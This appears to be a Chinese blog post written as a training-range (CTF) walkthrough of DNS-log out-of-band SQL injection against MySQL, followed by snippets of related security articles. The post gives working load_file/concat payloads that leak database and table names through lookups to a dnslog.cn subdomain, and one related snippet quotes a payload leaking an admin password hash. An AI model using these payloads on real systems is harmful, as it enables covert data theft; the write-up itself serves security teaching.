渗透测试(四)DNS-log注入

最新推荐文章于 2025-03-13 19:20:19 发布
原创 最新推荐文章于 2025-03-13 19:20:19 发布
· 1.2k 阅读 · 3 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全漏洞

DNS log注入

测试靶场(掌控安全学院靶场):https://hack.zkaq.cn/battle/target?id=10679db0fd3523e5

  • 分析:挖掘到目标网站有注入点,可通过DNS-log注入,拿到想要的数据
  1. 明白DNS原理,知道域名解析时域名服务器会记录log,但在别人服务器上我们看不到该log,则找工具:dnslog.cn 或者 ceye.io 上去回显出我们想要的数据
  2. 以mysql为例,构造注入语句,以load_file()函数配合dns-log得到数据
  3. mysql中load_file() 函数为加载文件,因此可构造此类型语句得到数据库数据:

select load_file("//file_path/file_name")

  1. 对此可拼接以下语句:

and (select load_file(concat('//',(select database()),'.rvf4kw.dnslog.cn/1.txt')))

在dnslog.cn中可查询到注入回显数据:

maoshe.rvf4kw.dnslog.cn

可得知当前database为:maoshe

  1. 找出该库下的所有表:admin、news

and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.rvf4kw.dnslog.cn/1.txt')))

  1. 由此可继续探索拿到我们想要的flag:FlaG-biubiu
DNS_LOG注入
学习、分享、交流
05-19 1723
DNSLOG注入:利用DNS解析,日志记录把数据库里面的内容给带出来···
掌控者靶场DNS-Log注入过程
zhaoxz1985的博客
07-15 1001
这里写自定义目录标题掌控者靶场DNS-Log注入过程0x01 前言0x02 利用思路0x03 靶场实战第一步:探测数据库名第二步:探测数据表名第三步:探测数据表对应的列名第步:瞎逼懵0x04 写在最后 掌控者靶场DNS-Log注入过程 以下过程是在听取了线上课程后,结合自身经验,完成的靶场练习,若过程中有错误,还请大佬指正。 0x01 前言 DNS-LogDNS是域名解析系统,说直白点就是机器名和IP地址转换。 DNS-Log,增加了一个log,也就是增加了一个日志记录,只不过记录的DNS的域名解析
DNSLog注入笔记
weixin_30781433的博客
09-12 887
测试一些网站的时候,一些注入都是无回显的,我们可以写脚本来进行盲注,但有些网站会ban掉我们的ip,这样我们可以通过设置ip代理池解决, 但是盲注往往效率很低,所以产生了DNSlog注入。具体原理如下。 首先需要有一个可以配置的域名,比如:ceye.io,然后通过代理商设置域名 ceye.io 的 nameserver 为自己的服务器 A,然后再服务器 A 上配置好 DNS Server,这样...
SQL注入(7)之DNSLOG注入
十步不敢沙人的博客
03-13 860
DNSLog注入如何实现无回显数据窃取?解析盲注与外带数据结合攻击链路,拆解DNS请求窃密步骤及防御策略,强化隐蔽漏洞检测能力!
渗透测试DNS侦查
安全命令
08-04 375
内容摘要: 我们可以通过DNS系统知道指定域名的很多信息。 文章目录nslookup的使用host的使用区域传输 nslookup的使用 我们可以用nslookup 来查询一个指定的域名信息。如: safecmd@kali:~$ nslookup www.bulbsecurity.com Server: 192.168.3.1 Address: 192.168.3.1#53 Non-authoritative answer: www.bulbsecurity.com .
渗透测试DNS收集-DIG
分享学习网络的点点滴滴
04-22 615
DNS收集是渗透测试信息收集必备的步骤
渗透测试专用DNS代理 - DNSChef
weixin_30849591的博客
01-29 423
DNSChef是一个高度可配置的DNS代理,用于渗透测试和恶意软件分析。DNS代理(又名“假DNS”),可用于分析用户间传输的网络流量。例如,我们可以使用一个DNS代理伪造所有到“badguy.com”的请求至本地计算机,进而对流量进行分析。 在最新的版本0.2中,引入了对IPv6的支持、大量新的DNS记录类型,自定义端口和其他常用的功能。 使用方法: 以root权限执行以下命令 # ...
[zkaq靶场]SQL注入--DNS-LOG注入
wwxxee
05-08 309
DNS注入 介绍 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被ban。 所以可以将select到的数据发送给一个url,利用dns解析产生的记录日志来查看数据。 原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录 此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接
渗透测试面试题--日更(1-9day)
IerkeU的博客
02-28 8234
day-one 1、拿到一个待检测的web站,渗透测试思路? 答: (1)信息收集 获取域名的whois信息,获取注册者的邮箱姓名电话等 查服务器的旁站以及子域名站点,因为主站一般比较难,所以可以先看看旁站有没有通用cms或者其他漏洞 查看服务器操作系统版本,web中间件,看看是否存在已知漏洞 查看IP,进行IP地址的全面扫描,对响应端口进行漏洞探测 (2)漏洞扫描:开始检测漏洞,例如XSS,XSRF,SQL注入,命令执行,越权访问,暴力破解… (3)漏洞利用:利益扫描到的漏洞拿到webshell或者其
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 4813
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
SQL注入DNSLog外带注入
dragon的博客
02-21 3368
什么是dnslog呢?DNS就是域名解析服务,把一个域名转换成对应的IP地址,转换完成之后,DNS服务器就会有一个日志记录本次转换的时间、域名、域名对应的ip、请求方的一些信息,这个日志就叫DNSLog。但是想要查看DNSLog信息的人,必须是拥有DNS服务器权限的人,这就使的我们要是用dnslog注入方法的话,就需要搭建自己的一个dns服务器,成本相对较高。所以在此就推荐两个平台,可以快速让我们使用dnslog外带注入也可以使用BurpSuite同样可以实现相应功能。
log4j2 变量注入漏洞(CVE-2021-44228)
weixin_40443268的博客
12-04 175
log4j2 JNDI注入漏洞(CVE-2021-44228) 概述 本文非常详细的从头到尾debug了CVE-2021-44228漏洞的利用过程,喜欢的师傅记得点个推荐~ Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志...
Log4j2注入漏洞(CVE-2021-44228)
2301_80115097的博客
10-10 172
最近Log4j2的JNDI注入漏洞(CVE-2021-44228)可以称之为“核弹”级别。Log4j2作为类似JDK级别的基础类库,几乎没人能够幸免。极盾科技技术总监对该漏洞进行复现和分析其形成原理。在此分享。以下涉及的代码,均在mac OS 10.14.5,JDK1.8.0_91环境下成功运行。
Kali Linux渗透测试实战 2.1 DNS信息收集
2401_88750741的博客
12-28 1212
从本节开始,我们从头开始,系统的学习基于Kali Linux的web应用渗透测试。本章主要目标是从各个角度搜集测试目标的基本信息,包括搜集信息的途径、各种工具的使用方法,以及简单的示例。按照循序渐进的原则,第一节讲解如何搜集DNS信息。对于工具的使用,我这里不打算把使用说明再搬到这里,意义不大。读者希望google就可以了。如果您对DNS的工作原理不是很了解,我建议您先在网上或者书籍上查阅相关资料。本节也对相关概念做了简单诠释,作为学习的辅助。
Dnslog在SQL注入 & 种数据库
3569
03-07 2895
https://www.anquanke.com/post/id/98096 mysql http://127.0.0.1/mysql.php?id=1 union select 1,2,load_file(CONCAT('\\',(SELECT hex(pass) FROM test.test_user WHERE name='admin' LIMIT 1),'.mysql.nk4...
Apache Log4j 远程代码注入漏洞
tanjunchen的博客
12-11 5723
漏洞说明 2021年12月9日,Apache Log4j2 Java 日志模块存在远程命令执行漏洞可直接控制目标服务器问题,攻击者攻击难度极低。由于 Apache Log4j2 某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。该漏洞可通过 critical、error、warining、notice、info、debug等日志级别触发,只需部分日志内容可控,此漏洞波及大量开源组件,包括 ELK、 Apache 、Struts2、Apache Solr、Apache Druid、A
DNSLOG渗透测试中的玩法儿
weixin_30558305的博客
12-29 906
首先了解一下DNS是啥???   DNS(Domain Name System,域名系统),万维网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串。通过域名,最终得到该域名对应的IP地址的过程叫做域名解析(或主机名解析)。DNS协议运行在UDP协议之上,使用端口号53。在RFC文档中RFC 2181对DNS有规范说明...
DNSLog注入及SQLmap工具使用
2301_80034711的博客
03-18 1414
DNSLog就是储存在DNS上的域名相关的信息,它可以记录我们对域名或者IP的访问信息,类似一个日志文件。比如说现在有一个xxx.aaa.com的域名(从右到左分别为顶级域名、二级域名、三级域名),将其域名设置对应的ip1.1.1.1我们向dns服务器发起aaa.com的解析请求时,DNSlog就会记录下对aaa.com的解析,那么解析值就为1.1.1.1,这样被记录下来的过程就是DNSLog。Sqlmap是一个使用python语言开发的开源的渗透测试工具,可以利用SQL注入漏洞,获取数据库服务器的权限。
Log4j2注入漏洞(CVE-2021-44228)万字深度剖析()—开篇与基础知识
跳小闹成长记
12-14 7875
本文将和大家一起对Log4j2的漏洞进行全面深入的剖析。我们将从如下几个方面进行讲解。 1、Log4j2漏洞的基本原理 2、Log4j2漏洞在Java高低版本中的不同攻击原理 3、Log4j2漏洞在Java高低版本中的攻击步骤 4、Log4j2漏洞在2.15.0-RC1中被绕过的原因 5、Log4j2最终修复方案(2.15.0)的原理
ssrf无回显和全回显
最新发布
04-03
- 枚举内网IP范围并扫描开放端口情况,绘制出一幅清晰的地图用于后续渗透测试活动开展。 #### 总结对比表 | 特性 | 无回显 | 全回显 | |--------------|--------------------------------------------------------...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值